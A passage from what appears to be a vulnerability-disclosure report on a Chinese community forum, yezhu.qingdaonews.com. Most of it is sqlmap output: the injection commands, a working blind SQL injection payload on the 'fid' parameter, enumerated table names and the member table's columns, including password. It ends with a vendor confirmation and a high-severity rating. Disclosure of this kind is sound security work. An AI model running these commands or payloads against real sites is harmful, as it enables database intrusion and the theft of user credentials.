pre_common_seccheck || pre_common_secquestion || pre_common_session || pre_common_setting || pre_common_smiley || pre_common_sphinxcounter || pre_common_stat || pre_common_statuser || pre_common_style || pre_common_stylevar || pre_common_syscache || pre_common_tag || pre_common_tagitem || pre_common_task || pre_common_taskvar || pre_common_template || pre_common_template_block || pre_common_template_permission || pre_common_uin_black || pre_common_usergroup || pre_common_usergroup_field || pre_common_visit || pre_common_word || pre_common_word_type || pre_connect_disktask || pre_connect_feedlog || pre_connect_memberbindlog || pre_connect_postfeedlog || pre_connect_tthreadlog || pre_dsu_paulsign || pre_dsu_paulsignemot || pre_dsu_paulsignset || pre_dzp || pre_dzp_jp || pre_forum_access || pre_forum_activity || pre_forum_activityapply || pre_forum_announcement || pre_forum_attachment || pre_forum_attachment_0 || pre_forum_attachment_1 || pre_forum_attachment_2 || pre_forum_attachment_3 || pre_forum_attachment_4 || pre_forum_attachment_5 || pre_forum_attachment_6 || pre_forum_attachment_7 || pre_forum_attachment_8 || pre_forum_attachment_9 || pre_forum_attachment_exif || pre_forum_attachment_unused || pre_forum_attachtype || pre_forum_bbcode || pre_forum_collection || pre_forum_collectioncomment || pre_forum_collectionfollow || pre_forum_collectioninvite || pre_forum_collectionrelated || pre_forum_collectionteamworker || pre_forum_collectionthread || pre_forum_creditslog || pre_forum_debate || pre_forum_debatepost || pre_forum_faq || pre_forum_filter_post || pre_forum_forum || pre_forum_forum_threadtable || pre_forum_forumfield || pre_forum_forumrecommend || pre_forum_groupcreditslog || pre_forum_groupfield || pre_forum_groupinvite || pre_forum_grouplevel || pre_forum_groupranking || pre_forum_groupuser || pre_forum_hotreply_member || pre_forum_hotreply_number || pre_forum_imagetype || pre_forum_medal || pre_forum_medallog || pre_forum_memberrecommend || pre_forum_moderator || pre_forum_modwork || pre_forum_newthread || pre_forum_onlinelist || pre_forum_optionvalue9 || pre_forum_order || pre_forum_poll || pre_forum_polloption || pre_forum_polloption_image || pre_forum_pollvoter || pre_forum_post || pre_forum_post_1 || pre_forum_post_2 || pre_forum_post_3 || pre_forum_post_4 || pre_forum_post_5 || pre_forum_post_6 || pre_forum_post_7 || pre_forum_post_location || pre_forum_post_moderate || pre_forum_post_tableid || pre_forum_postcache || pre_forum_postcomment || pre_forum_postlog || pre_forum_postposition || pre_forum_poststick || pre_forum_promotion || pre_forum_ratelog || pre_forum_relatedthread || pre_forum_replycredit || pre_forum_rsscache || pre_forum_sofa || pre_forum_spacecache || pre_forum_statlog || pre_forum_thread || pre_forum_thread_bak_20150910 || pre_forum_thread_moderate || pre_forum_threadaddviews || pre_forum_threadcalendar || pre_forum_threadclass || pre_forum_threadclosed || pre_forum_threaddisablepos || pre_forum_threadhidelog || pre_forum_threadhot || pre_forum_threadimage || pre_forum_threadlog || pre_forum_threadmod || pre_forum_threadpartake || pre_forum_threadpreview || pre_forum_threadprofile || pre_forum_threadprofile_group || pre_forum_threadrush || pre_forum_threadtype || pre_forum_trade || pre_forum_tradecomment || pre_forum_tradelog || pre_forum_typeoption || pre_forum_typeoptionvar || pre_forum_typevar || pre_forum_warning || pre_home_album || pre_home_album_category || pre_home_appcreditlog || pre_home_blacklist || pre_home_blog || pre_home_blog_category || pre_home_blog_moderate || pre_home_blogfield || pre_home_class || pre_home_click || pre_home_clickuser || pre_home_comment || pre_home_comment_moderate || pre_home_docomment || pre_home_doing || pre_home_doing_moderate || pre_home_favorite || pre_home_feed || pre_home_feed_app || pre_home_follow || pre_home_follow_feed || pre_home_follow_feed_archiver || pre_home_friend || pre_home_friend_request || pre_home_friendlog || pre_home_notification || pre_home_pic || pre_home_pic_moderate || pre_home_picfield || pre_home_poke || pre_home_pokearchive || pre_home_share || pre_home_share_moderate || pre_home_show || pre_home_specialuser || pre_home_userapp || pre_home_userappfield || pre_home_visitor || pre_hux_wx || pre_hux_wx_action || pre_hux_wx_config || pre_hux_wx_userjp || pre_inner_page || pre_inner_page_config || pre_innermember || pre_innertopic_stat || pre_k_spider || pre_mobile_setting || pre_mobile_wechat_authcode || pre_mobile_wechat_masssend || pre_mobile_wechat_resource || pre_mobile_wsq_threadlist || pre_mobileoem_member || pre_mobileoem_pushthreads || pre_moder_rank || pre_myrepeats || pre_nayuan_report_component || pre_plugin_auction || pre_plugin_auction_message || pre_plugin_auction_xml || pre_plugin_auctionapply || pre_plugin_autoreply_member || pre_plugin_autoreply_thread || pre_plugin_banklist || pre_plugin_banklog || pre_plugin_bankoperation || pre_plugin_monthmoney || pre_portal_article_content || pre_portal_article_count || pre_portal_article_moderate || pre_portal_article_related || pre_portal_article_title || pre_portal_article_trash || pre_portal_attachment || pre_portal_category || pre_portal_category_permission || pre_portal_comment || pre_portal_comment_moderate || pre_portal_rsscache || pre_portal_topic || pre_portal_topic_pic || pre_post_count || pre_security_evilpost || pre_security_eviluser || pre_security_failedlog || pre_tujoin_copyright || pre_ucenter_admins || pre_ucenter_applications || pre_ucenter_badwords || pre_ucenter_domains || pre_ucenter_failedlogins || pre_ucenter_feeds || pre_ucenter_friends || pre_ucenter_mailqueue || pre_ucenter_memberfields || pre_ucenter_members || pre_ucenter_mergemembers || pre_ucenter_newpm || pre_ucenter_notelist || pre_ucenter_pm_indexes || pre_ucenter_pm_lists || pre_ucenter_pm_members || pre_ucenter_pm_messages_0 || pre_ucenter_pm_messages_1 || pre_ucenter_pm_messages_2 || pre_ucenter_pm_messages_3 || pre_ucenter_pm_messages_4 || pre_ucenter_pm_messages_5 || pre_ucenter_pm_messages_6 || pre_ucenter_pm_messages_7 || pre_ucenter_pm_messages_8 || pre_ucenter_pm_messages_9 || pre_ucenter_protectedmembers || pre_ucenter_settings || pre_ucenter_sqlcache || pre_ucenter_tags || pre_ucenter_vars || pre_wuxin_findyou || pre_wz_postvisitors || qdfangchan || reg || stat_mod || sys_auth || sys_log || sys_menu || sys_per || sys_user || tem_log || tem_vote || third || vote_activity || vote_log || vote_rule || vote_works || vote_wxr || weixin2014 || weixin_2 || wx_alipay_orderlist || wx_annaxi || wx_annaxi_book || wx_annaxi_user || wx_cailou || wx_fm || wx_ggl_haibo || wx_ggl_haibo_jp || wx_ggl_share || wx_ggl_text || wx_heda_book || wx_house_xnyw || wx_house_yao || wx_huodong_shake || wx_jiaju_home_cate || wx_jiaju_home_copy || wx_jiaju_home_pic || wx_jiaju_homes || wx_level || wx_lvhua || wx_lvhua_zan || wx_qingren || wx_villa || wx_weather || wx_wxpay || wx_wxpay_bm || wx_wxpay_code || wx_wxpay_code_zhgj || wx_wxpay_codeid_sm1 || wx_wxpay_liqun || wx_wxpay_liqun_pecode || wx_wxpay_liqun_sm || wx_wxpay_notice || wx_wxpay_orderlist || wx_wxpay_orderlist_jiaju || wx_wxpay_orderlist_sm || wx_wxpay_orderlist_zhgj || wx_wxpay_right || wx_wxpay_tmh || wx_wxpay_tmh_user || wx_wxpay_tran_sm || wx_wxpay_user || wx_wxpay_user_jiaju || wx_wxpay_user_sm || wx_wxpay_user_zhgj || wx_yuhai_book || wxl_admin || wxl_life || wxl_lroom || wxl_lroom_order || wxl_lroom_route || wxl_member || wxl_mesboard || wxl_module || wxl_picture || wxl_picture_active || wxl_picture_config || wxl_picture_engin || wxl_picture_proto || wxl_uppic || wxl_vote || wxl_vote_rate || wxl_wechat || wydc || xk_baseconfig || xk_spider_job || xk_spider_job_later || xk_spider_url || xk_statiq || yz_build || yz_owner || yz_owner_his || yz_owner_invites || zp_main || zp_result |+---------------------------------------+[15:35:15] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/yezhu.qingdaonews.com'[*] shutting down at 15:35:15root@root:~# sqlmap -u http://yezhu.qingdaonews.com/threadcount.php?fid=656--columns -T pre_common_member -D ultrax3 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 14:36:03[14:36:03] [INFO] resuming back-end DBMS 'mysql' [14:36:03] [INFO] testing connection to the target URL[14:36:04] [INFO] heuristics detected web page charset 'ascii'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: fid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fid=656' AND 5921=5921 AND 'QYrB'='QYrB---[14:36:04] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.4.25back-end DBMS: MySQL 5[14:36:04] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/yezhu.qingdaonews.com'[*] shutting down at 14:36:04root@root:~# sqlmap -u http://yezhu.qingdaonews.com/threadcount.php?fid=656 --columns -T pre_common_member -D ultrax3 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 14:36:43[14:36:44] [INFO] resuming back-end DBMS 'mysql' [14:36:44] [INFO] testing connection to the target URL[14:36:44] [INFO] heuristics detected web page charset 'ascii'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: fid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fid=656' AND 5921=5921 AND 'QYrB'='QYrB---[14:36:44] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.4.25back-end DBMS: MySQL 5[14:36:44] [INFO] fetching columns for table 'pre_common_member' in database 'ultrax3'[14:36:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[14:36:44] [INFO] retrieved: 25[14:36:45] [INFO] retrieved: uid[14:36:49] [INFO] retrieved: mediumint(8) unsigned[14:36:58] [INFO] retrieved: xiaoqu[14:37:00] [INFO] retrieved: varchar(100)[14:37:06] [INFO] retrieved: email[14:37:08] [INFO] retrieved: char(40)[14:37:12] [INFO] retrieved: username[14:37:16] [INFO] retrieved: char(15)[14:37:20] [INFO] retrieved: password[14:37:26] [INFO] retrieved: char(32)[14:37:29] [INFO] retrieved: status[14:37:32] [INFO] retrieved: tinyint(1)[14:37:36] [INFO] retrieved: emailstatus[14:37:43] [INFO] retrieved: tinyint(1)[14:37:48] [INFO] retrieved: avatarstatus[14:37:54] [INFO] retrieved: tinyint(1)[14:37:58] [INFO] retrieved: videophotostatus[14:38:05] [INFO] retrieved: tinyint(1)[14:38:12] [INFO] retrieved: adminid[14:38:16] [INFO] retrieved: tinyint(1)[14:38:20] [INFO] retrieved: groupid[14:38:24] [INFO] retrieved: smallint(6) unsigned[14:38:33] [INFO] retrieved: groupexpiry[14:38:38] [INFO] retrieved: int(10) unsigned[14:38:45] [INFO] retrieved: extgroupids[14:38:50] [INFO] retrieved: char(20)[14:38:53] [INFO] retrieved: regdate[14:38:56] [INFO] retrieved: int(10) unsigned[14:39:07] [INFO] retrieved: credits[14:39:13] [INFO] retrieved: int(10)[14:39:16] [INFO] retrieved: notifysound[14:39:20] [INFO] retrieved: tinyint(1)[14:39:26] [INFO] retrieved: timeoffset[14:39:30] [INFO] retrieved: char(4)[14:39:34] [INFO] retrieved: newpm[14:39:37] [INFO] retrieved: smallint(6) unsigned[14:39:44] [INFO] retrieved: newprompt[14:39:48] [INFO] retrieved: smallint(6) unsigned[14:39:57] [INFO] retrieved: accessmasks[14:40:07] [INFO] retrieved: tinyint(1)[14:40:16] [INFO] retrieved: allowadmincp[14:40:21] [INFO] retrieved: tinyint(1)[14:40:25] [INFO] retrieved: onlyacceptfriendpm[14:40:35] [INFO] retrieved: tinyint(1)[14:40:47] [INFO] retrieved: conisbind[14:41:05] [INFO] retrieved: tinyint(1) unsigned[14:41:19] [INFO] retrieved: freeze[14:41:22] [INFO] retrieved: tinyint(1)[14:41:26] [INFO] retrieved: if_robot[14:41:29] [INFO] retrieved: tinyint(1)Database: ultrax3Table: pre_common_member[25 columns]+--------------------+-----------------------+| Column | Type |+--------------------+-----------------------+| accessmasks | tinyint(1) || adminid | tinyint(1) || allowadmincp | tinyint(1) || avatarstatus | tinyint(1) || conisbind | tinyint(1) unsigned || credits | int(10) || email | char(40) || emailstatus | tinyint(1) || extgroupids | char(20) || freeze | tinyint(1) || groupexpiry | int(10) unsigned || groupid | smallint(6) unsigned || if_robot | tinyint(1) || newpm | smallint(6) unsigned || newprompt | smallint(6) unsigned || notifysound | tinyint(1) || onlyacceptfriendpm | tinyint(1) || password | char(32) || regdate | int(10) unsigned || status | tinyint(1) || timeoffset | char(4) || uid | mediumint(8) unsigned || username | char(15) || videophotostatus | tinyint(1) || xiaoqu | varchar(100) |+--------------------+-----------------------+[14:41:35] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/yezhu.qingdaonews.com'[*] shutting down at 14:41:35root@root:~#
what the devil ?I don't Know?
危害等级:高
漏洞Rank:11
确认时间:2015-09-15 10:02
谢谢大白。 这个论坛使用discuz,开发人员做一些二次开发,漏洞一直是个问题。
暂无
